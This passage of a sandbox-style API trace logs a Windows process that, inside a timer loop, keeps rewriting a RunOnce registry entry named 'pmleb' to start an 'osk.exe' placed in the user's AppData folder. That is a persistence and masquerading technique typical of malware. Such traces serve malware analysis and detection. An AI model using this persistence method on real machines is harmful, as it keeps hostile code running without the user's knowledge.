[0101.360] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.374] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.374] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.374] KillTimer (hWnd=0x20280, uIDEvent=0x2391) returned 1 [0101.375] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.375] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.375] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.375] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.376] RegCloseKey (hKey=0x280) returned 0x0 [0101.376] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.376] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.376] SetTimer (hWnd=0x20280, nIDEvent=0x2392, uElapse=0xa, lpTimerFunc=0x0) returned 0x2392 [0101.376] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.390] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.390] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.390] KillTimer (hWnd=0x20280, uIDEvent=0x2392) returned 1 [0101.390] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.391] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.391] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.391] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.391] RegCloseKey (hKey=0x280) returned 0x0 [0101.391] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.392] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.392] SetTimer (hWnd=0x20280, nIDEvent=0x2393, uElapse=0xa, lpTimerFunc=0x0) returned 0x2393 [0101.392] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.405] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.405] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.406] KillTimer (hWnd=0x20280, uIDEvent=0x2393) returned 1 [0101.406] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.406] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.406] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.407] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.407] RegCloseKey (hKey=0x280) returned 0x0 [0101.407] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.407] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.407] SetTimer (hWnd=0x20280, nIDEvent=0x2394, uElapse=0xa, lpTimerFunc=0x0) returned 0x2394 [0101.407] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0101.421] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.421] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.421] KillTimer (hWnd=0x20280, uIDEvent=0x2394) returned 1 [0101.422] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.422] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.422] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.422] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.422] RegCloseKey (hKey=0x280) returned 0x0 [0101.423] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.423] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.423] SetTimer (hWnd=0x20280, nIDEvent=0x2395, uElapse=0xa, lpTimerFunc=0x0) returned 0x2395 [0101.423] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.437] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.437] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.437] KillTimer (hWnd=0x20280, uIDEvent=0x2395) returned 1 [0101.438] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.438] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.438] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.438] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.439] RegCloseKey (hKey=0x280) returned 0x0 [0101.439] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.439] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.439] SetTimer (hWnd=0x20280, nIDEvent=0x2396, uElapse=0xa, lpTimerFunc=0x0) returned 0x2396 [0101.439] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.452] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.452] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.453] KillTimer (hWnd=0x20280, uIDEvent=0x2396) returned 1 [0101.453] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.453] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.453] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.453] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.454] RegCloseKey (hKey=0x280) returned 0x0 [0101.454] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.454] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.454] SetTimer (hWnd=0x20280, nIDEvent=0x2397, uElapse=0xa, lpTimerFunc=0x0) returned 0x2397 [0101.454] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.468] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.468] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.468] KillTimer (hWnd=0x20280, uIDEvent=0x2397) returned 1 [0101.468] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.469] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.469] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.469] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.469] RegCloseKey (hKey=0x280) returned 0x0 [0101.469] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.469] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.469] SetTimer (hWnd=0x20280, nIDEvent=0x2398, uElapse=0xa, lpTimerFunc=0x0) returned 0x2398 [0101.470] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.483] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.484] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.484] KillTimer (hWnd=0x20280, uIDEvent=0x2398) returned 1 [0101.484] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.484] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.484] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.485] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.485] RegCloseKey (hKey=0x280) returned 0x0 [0101.485] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.485] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.485] SetTimer (hWnd=0x20280, nIDEvent=0x2399, uElapse=0xa, lpTimerFunc=0x0) returned 0x2399 [0101.485] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.499] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.499] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.499] KillTimer (hWnd=0x20280, uIDEvent=0x2399) returned 1 [0101.499] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.500] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.500] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.500] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.500] RegCloseKey (hKey=0x280) returned 0x0 [0101.500] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.501] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.501] SetTimer (hWnd=0x20280, nIDEvent=0x239a, uElapse=0xa, lpTimerFunc=0x0) returned 0x239a [0101.501] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.515] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.515] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.515] KillTimer (hWnd=0x20280, 
uIDEvent=0x239a) returned 1 [0101.515] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.516] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.516] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.516] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.516] RegCloseKey (hKey=0x280) returned 0x0 [0101.516] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.517] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.517] SetTimer (hWnd=0x20280, nIDEvent=0x239b, uElapse=0xa, lpTimerFunc=0x0) returned 0x239b [0101.517] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.530] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.530] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.530] KillTimer (hWnd=0x20280, uIDEvent=0x239b) returned 1 [0101.531] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.531] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.531] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.531] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.532] RegCloseKey (hKey=0x280) returned 0x0 [0101.532] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.532] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.532] SetTimer (hWnd=0x20280, nIDEvent=0x239c, uElapse=0xa, lpTimerFunc=0x0) returned 0x239c [0101.532] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.546] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.546] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.547] KillTimer (hWnd=0x20280, uIDEvent=0x239c) returned 1 [0101.547] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.547] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.547] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.548] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.548] RegCloseKey (hKey=0x280) returned 0x0 [0101.548] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.548] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.548] SetTimer (hWnd=0x20280, nIDEvent=0x239d, uElapse=0xa, lpTimerFunc=0x0) returned 0x239d [0101.548] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.561] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.561] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.562] KillTimer (hWnd=0x20280, uIDEvent=0x239d) returned 1 [0101.562] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0101.562] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.562] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.563] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.563] RegCloseKey (hKey=0x280) returned 0x0 [0101.563] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.563] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.563] SetTimer (hWnd=0x20280, nIDEvent=0x239e, uElapse=0xa, lpTimerFunc=0x0) returned 0x239e [0101.563] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.577] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.577] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.577] KillTimer (hWnd=0x20280, uIDEvent=0x239e) returned 1 [0101.578] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.578] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.578] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.578] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.579] RegCloseKey (hKey=0x280) returned 0x0 
[0101.579] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.579] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.579] SetTimer (hWnd=0x20280, nIDEvent=0x239f, uElapse=0xa, lpTimerFunc=0x0) returned 0x239f [0101.579] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.593] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.593] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.593] KillTimer (hWnd=0x20280, uIDEvent=0x239f) returned 1 [0101.594] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.594] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.594] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.594] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.594] RegCloseKey (hKey=0x280) returned 0x0 [0101.595] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.595] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.595] SetTimer (hWnd=0x20280, nIDEvent=0x23a0, uElapse=0xa, lpTimerFunc=0x0) returned 0x23a0 [0101.595] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.608] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.608] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.609] KillTimer (hWnd=0x20280, uIDEvent=0x23a0) returned 1 [0101.609] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.609] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.609] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.609] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.610] RegCloseKey (hKey=0x280) returned 0x0 [0101.610] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.610] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.610] SetTimer (hWnd=0x20280, nIDEvent=0x23a1, uElapse=0xa, lpTimerFunc=0x0) returned 0x23a1 [0101.610] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.624] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.624] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.624] KillTimer (hWnd=0x20280, uIDEvent=0x23a1) returned 1 [0101.624] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.625] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.625] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.625] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.625] RegCloseKey (hKey=0x280) returned 0x0 [0101.625] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.626] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.626] SetTimer (hWnd=0x20280, nIDEvent=0x23a2, uElapse=0xa, lpTimerFunc=0x0) returned 0x23a2 [0101.626] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.640] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.640] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.640] KillTimer (hWnd=0x20280, uIDEvent=0x23a2) returned 1 [0101.641] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.641] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.641] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.641] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.641] RegCloseKey (hKey=0x280) returned 0x0 [0101.641] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.641] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.641] SetTimer (hWnd=0x20280, nIDEvent=0x23a3, uElapse=0xa, lpTimerFunc=0x0) returned 0x23a3 [0101.642] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.655] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.656] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.656] KillTimer (hWnd=0x20280, uIDEvent=0x23a3) returned 1 [0101.656] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.656] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.656] RegCreateKeyExA (in: hKey=0x80000001, 
